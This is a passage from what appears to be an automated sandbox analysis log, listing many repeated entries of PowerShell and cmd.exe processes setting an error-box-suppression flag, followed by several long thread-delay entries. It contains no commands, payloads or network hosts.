    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
